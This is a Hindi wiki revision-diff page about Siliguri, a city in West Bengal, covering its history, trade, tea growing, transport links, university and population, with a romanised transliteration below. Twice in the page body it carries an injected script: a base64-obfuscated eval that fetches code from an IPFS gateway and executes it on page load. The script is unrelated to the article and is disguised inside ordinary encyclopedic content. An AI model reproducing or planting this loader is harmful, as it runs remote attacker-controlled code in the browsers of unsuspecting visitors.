Difference between revisions of "सिलीगुड़ी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
{{पुनरीक्षण}}
 
 
{{tocright}}
 
{{tocright}}
सिलीगुड़ी शहर, उत्तरी [[पश्चिम बंगाल]] राज्य के, पूर्वोत्तर [[भारत]] में है। 1931 में इसे नगरपालिका के रूप में गठित किया गया, लेकिन अब इसे नगर निगम का दर्जा दे दिया गया है। दो नदियाँ बालासन और महानन्दा यहाँ से उत्तरी बंगाल राज्य [[कलिंपोंग]] और [[सिक्किम]] से आने वाली सड़कों का यह अंतिम केंद्र हैं। 1947 में बंग्लादेश के गठन के बाद यह शाहर भीड़भाड़ वाला शरणार्थी केंद्र बन गया। अंतर्राष्ट्रीय सीमाओं से निकटता के कारण इसका सामरिक महत्त्व बढ़ा है।  
+
सिलीगुड़ी शहर, उत्तरी [[पश्चिम बंगाल]] राज्य के, पूर्वोत्तर [[भारत]] में है। 1931 में इसे नगरपालिका के रूप में गठित किया गया, लेकिन अब इसे नगर निगम का दर्जा दे दिया गया है। दो नदियाँ बालासन और महानन्दा यहाँ से होकर बहती हैं। उत्तरी बंगाल राज्य [[कलिंपोंग]] और [[सिक्किम]] से आने वाली सड़कों का यह अंतिम केंद्र हैं। 1947 में [[बांग्लादेश]] के गठन के बाद यह शहर भीड़भाड़ वाला शरणार्थी केंद्र बन गया। अंतर्राष्ट्रीय सीमाओं से निकटता के कारण इसका सामरिक महत्त्व बढ़ा है।  
 
==उद्योग और व्यापार==
 
==उद्योग और व्यापार==
 
सिलीगुड़ी, [[दार्जिलिंग]] और सिक्किम के बीच व्यापार का प्रमुख केंद्र है। सिलीगुड़ी शहर में आरा और पटसन के महत्त्वपूर्ण उद्योग हैं।
 
सिलीगुड़ी, [[दार्जिलिंग]] और सिक्किम के बीच व्यापार का प्रमुख केंद्र है। सिलीगुड़ी शहर में आरा और पटसन के महत्त्वपूर्ण उद्योग हैं।
==यातायात और परिवहन==
 
सिलीगुड़ी शहर के निकट स्थित उत्तरी बंगाल के सबसे महत्त्वपूर्ण हवाई अड्डे बागडोगरा से जुड़ा है। सिलीगुड़ी शहर [[कोलकाता]] से 584 किलोमीटर की दूरी पर है, सिलीगुड़ी शहर पूर्वोत्तर सीमांत रेलवे और उत्तरी बंगाल राज्य परिवहन निगम कार्यरत हैं। दार्जिलिंग और जलपाईगुड़ी से यह सड़क और रेलमार्ग द्वारा जुड़ा है। 
 
 
==कृषि और खनिज==
 
==कृषि और खनिज==
 
सिलीगुड़ी शहर के आसपास [[चाय]] की खेती भी होती है।   
 
सिलीगुड़ी शहर के आसपास [[चाय]] की खेती भी होती है।   
 +
==यातायात और परिवहन==
 +
सिलीगुड़ी शहर निकट स्थित उत्तरी बंगाल के सबसे महत्त्वपूर्ण हवाई अड्डे बागडोगरा से जुड़ा है। सिलीगुड़ी शहर [[कोलकाता]] से 584 किलोमीटर की दूरी पर है, सिलीगुड़ी शहर पूर्वोत्तर सीमांत रेलवे और उत्तरी बंगाल राज्य परिवहन निगम कार्यरत हैं। दार्जिलिंग और जलपाईगुड़ी से यह सड़क और रेलमार्ग द्वारा जुड़ा है।
 
==शिक्षण संस्थान==
 
==शिक्षण संस्थान==
सिलीगुड़ी शहर के राजा राममनोहरपुर में उत्तरी बंगाल विश्वविद्यालय है। इस विश्वविद्याल से कई महाविद्यालय संबद्ध हैं।  
+
सिलीगुड़ी के राजा राममनोहरपुर में उत्तरी बंगाल विश्वविद्यालय है। इस विश्वविद्याल से कई महाविद्यालय संबद्ध हैं।  
 
==जनसंख्या==
 
==जनसंख्या==
सिलीगुड़ी शहर की जनसंख्या 2001 में जनगणना के अनुसार 4,70,273 है।
+
सिलीगुड़ी शहर की जनसंख्या 2001 की जनगणना के अनुसार 4,70,273 है।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
Line 21: Line 20:
  
 
==संबंधित लेख==
 
==संबंधित लेख==
 
+
{{पश्चिम बंगाल के नगर}}
 
[[Category:पश्चिम_बंगाल]]
 
[[Category:पश्चिम_बंगाल]]
[[Category:भारत_के_ज़िले]]
+
[[Category:भारत_के_नगर]]
 
[[Category:पश्चिम बंगाल के नगर]]
 
[[Category:पश्चिम बंगाल के नगर]]
  
 
__INDEX__
 
__INDEX__

Revision as of 06:24, 28 August 2011

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

siligu di shahar, uttari pashchim bangal rajy ke, poorvottar bharat mean hai. 1931 mean ise nagarapalika ke roop mean gathit kiya gaya, lekin ab ise nagar nigam ka darja de diya gaya hai. do nadiyaan balasan aur mahananda yahaan se hokar bahati haian. uttari bangal rajy kalianpoang aur sikkim se ane vali s dakoan ka yah aantim keandr haian. 1947 mean baangladesh ke gathan ke bad yah shahar bhi dabha d vala sharanarthi keandr ban gaya. aantarrashtriy simaoan se nikatata ke karan isaka samarik mahattv badha hai.

udyog aur vyapar

siligu di, darjiliang aur sikkim ke bich vyapar ka pramukh keandr hai. siligu di shahar mean ara aur patasan ke mahattvapoorn udyog haian.

krishi aur khanij

siligu di shahar ke asapas chay ki kheti bhi hoti hai.

yatayat aur parivahan

siligu di shahar nikat sthit uttari bangal ke sabase mahattvapoorn havaee adde bagadogara se ju da hai. siligu di shahar kolakata se 584 kilomitar ki doori par hai, siligu di shahar poorvottar simaant relave aur uttari bangal rajy parivahan nigam karyarat haian. darjiliang aur jalapaeegu di se yah s dak aur relamarg dvara ju da hai.

shikshan sansthan

siligu di ke raja ramamanoharapur mean uttari bangal vishvavidyalay hai. is vishvavidyal se kee mahavidyalay sanbaddh haian.

janasankhya

siligu di shahar ki janasankhya 2001 ki janaganana ke anusar 4,70,273 hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh